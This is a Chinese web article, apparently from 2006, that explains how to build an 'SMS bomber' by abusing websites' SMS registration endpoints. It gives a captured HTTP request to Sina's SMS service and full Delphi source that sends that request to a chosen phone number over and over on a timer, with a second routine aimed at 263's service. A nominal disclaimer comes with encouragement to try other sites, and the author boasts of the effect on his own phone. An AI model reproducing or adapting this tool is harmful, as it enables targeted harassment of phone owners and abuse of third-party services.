分享
 
 
 

利用网站短信漏洞,做自己的手机短信轰炸机

王朝delphi·作者佚名  2006-01-08
窄屏简体版  字體: |||超大  

利用网站短信漏洞,做自己的手机短信轰炸机

昨天晚上在水源看到有人在传播短信轰炸机,见http://expert.csdn.net/Expert/topic/1851/1851433.xml?temp=.7669336,一时心血来潮,自己也写一个把,声明:在写这篇文章之前,该篇文章只用于学习,任何用于非法骚扰别人的行为,后果自负,与本人无关,警告大家不要用于违法行为。

该软件目前主要用于对新浪短信网络,大家可以多试一下其他网站的短信服务,比如263,搜虎,雅虎,西陆,中国短信网等,目前新浪,雅虎对此已有限制,可以说短信轰炸功能已完全失效,新浪现在限制一个IP只能注册5次,除非你采用动态拨号啊,如果他们采用输入附加码验证的功能,我们就更没有好的办法了,呵呵~~~

大家先看一下在新浪网注册短信时截获的信息把~~

/cgi-bin/sms/register.cgi HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*

Referer: http://sms.sina.com.cn/docs/register.html

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

Host: sms.sina.com.cn

Content-Length: 34

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: SMSLOGIN=0; USRTYPE=C

mobile=13666666666&lang=1&ad_tag=1

以上的内容我就不详细介绍了,相比大家都能看懂,请注意mobile=13666666666,这就是你要轰炸的手机号码,主机是:sms.sina.com.cn

,提交页面: /cgi-bin/sms/register.cgi HTTP/1.1

我们现在要做的就是构造Http短信包,然后利用Delphi5的ClientSocket控件发送到新浪的短信服务器的80端口即可,很简单的啊 :)

窗口控件:

一个ClientSocket控件,一个TTimer,两个文本框,一个用于输入手机号,一个输入延时,还有两个按纽。

截图如下:

原代码部分:

unit smsBomber;

interface

uses

Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,

ScktComp, NMURL, StdCtrls, ComCtrls, ExtCtrls;

type

TForm1 = class(TForm)

url: TNMURL;

ClientSocket1: TClientSocket;

Label1: TLabel;

Edit1: TEdit;

Button1: TButton;

Button2: TButton;

StatusBar1: TStatusBar;

Timer1: TTimer;

Label2: TLabel;

Edit2: TEdit;

procedure Button1Click(Sender: TObject);

procedure ClientSocket1Error(Sender: TObject; Socket: TCustomWinSocket;

ErrorEvent: TErrorEvent; var ErrorCode: Integer);

procedure ClientSocket1Read(Sender: TObject; Socket: TCustomWinSocket);

procedure Button2Click(Sender: TObject);

procedure ClientSocket1Connect(Sender: TObject;

Socket: TCustomWinSocket);

procedure Timer1Timer(Sender: TObject);

procedure Edit1KeyPress(Sender: TObject; var Key: Char);

procedure Edit2KeyPress(Sender: TObject; var Key: Char);

private

{ Private declarations }

procedure BuildHttpHeadForSina();

procedure BuildHttpHeadFor263();

public

{ Public declarations }

end;

var

Form1: TForm1;

implementation

{$R *.DFM}

procedure TForm1.Button1Click(Sender: TObject);

begin

if edit1.Text='' then

begin

showmessage('手机号不能为空!');

exit;

end;

clientsocket1.active:=true;

Timer1Timer(sender);

end;

procedure TForm1.ClientSocket1Error(Sender: TObject;

Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;

var ErrorCode: Integer);

begin

StatusBar1.SimpleText:='连接出错!';

errorcode:=0;

end;

procedure TForm1.ClientSocket1Read(Sender: TObject;

Socket: TCustomWinSocket);

var

s:string;

begin

s:=socket.ReceiveText;

if pos('成功',s)<>0 then

begin

clientsocket1.Active :=false;

StatusBar1.SimpleText:='发送成功!';

clientsocket1.active:=true;

end else

begin

StatusBar1.SimpleText:='发送失败!';

clientsocket1.active:=false;

end;

end;

procedure TForm1.Button2Click(Sender: TObject);

begin

Close;

end;

//针对新浪网的短信轰炸,非常好用,笔者刚调试完曾对自己的手机进行过一番狂轰乱炸,效果十分明显,迫使不得不关机,不过目前已经不灵了啊 :)

procedure TForm1.BuildHttpHeadForSina;

var

sends,sendc:string;

begin

//Http头信息

sends:='POST /cgi-bin/sms/register.cgi HTTP/1.1'+#13#10;

sends:=sends+'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*'+#13#10;

sends:=sends+'Referer: http://sms.sina.com.cn/docs/register.html'+#13#10;

sends:=sends+'Accept-Language: zh-cn'+#13#10;

sends:=sends+'Content-Type: application/x-www-form-urlencoded'+#13#10;

sends:=sends+'Accept-Encoding: gzip, deflate'+#13#10;

sends:=sends+'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)'+#13#10;

sends:=sends+'Host: sms.sina.com.cn'+#13#10;

sends:=sends+'Cache-Control: no-cache'+#13+#10;

sends:=sends+'Cookie: SMSLOGIN=0; USRTYPE=C'+#13+#10;

//发送的内容

url.inputstring:=trim(edit1.text);

sendc:='mobile='+url.Encode;

sendc:=sendc+'&lang=1&ad_tag=1';

sends:=sends+'Content-Length: '+inttostr(length(sendc))+#13#10;

sends:=sends+'Connection: Keep-Alive'+#13+#10+#13#10 +sendc;

clientsocket1.Host :='202.108.37.148';

clientsocket1.Port :=80;

clientsocket1.Socket.SendText(sends);

end;

procedure TForm1.ClientSocket1Connect(Sender: TObject;

Socket: TCustomWinSocket);

begin

BuildHttpHeadForSina(); //对新浪短信网进行轰炸

end;

//定时发送

procedure TForm1.Timer1Timer(Sender: TObject);

begin

Timer1.Interval :=strtoint(trim(edit2.text));

timer1.Enabled :=true;

BuildHttpHeadForSina();

end;

procedure TForm1.Edit1KeyPress(Sender: TObject; var Key: Char);

begin

if not (key in ['0'..'9',#8,#13]) then

begin

key :=#0;

end;

end;

procedure TForm1.Edit2KeyPress(Sender: TObject; var Key: Char);

begin

if not (key in ['0'..'9',#8,#13]) then

begin

key :=#0;

end;

end;

//这个是用于263短信网站的,目前还没试验成功

procedure TForm1.BuildHttpHeadFor263;

var

sends,sendc:string;

begin

//Http头信息

sends:='POST /cgi-bin/mobile/bin/user_getpass.cgi HTTP/1.1'+#13#10;

sends:=sends+'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*'+#13#10;

sends:=sends+'Referer: http://sms.263.net/getpass.html'+#13#10;

sends:=sends+'Accept-Language: zh-cn'+#13#10;

sends:=sends+'Content-Type: application/x-www-form-urlencoded'+#13#10;

sends:=sends+'Accept-Encoding: gzip, deflate'+#13#10;

sends:=sends+'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)'+#13#10;

sends:=sends+'Host: sms.263.net'+#13#10;

sends:=sends+'Cache-Control: no-cache'+#13+#10;

sends:=sends+'Cookie: SMSLOGIN=0; USRTYPE=C'+#13+#10;

//发送的内容

url.inputstring:=trim(edit1.text);

sendc:='phone='+url.Encode;

sendc:=sendc+'&Submit2=%C8%B7%B6%A8';

sends:=sends+'Content-Length: '+inttostr(length(sendc))+#13#10;

sends:=sends+'Connection: Keep-Alive'+#13+#10+#13#10 +sendc;

clientsocket1.Host :='210.78.128.62';

clientsocket1.Port :=80;

clientsocket1.Socket.SendText(sends);

end;

end.

有时间大家可以多试几个手机短信网站,不过千万不要随便骚扰别人啊~~~ :)

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有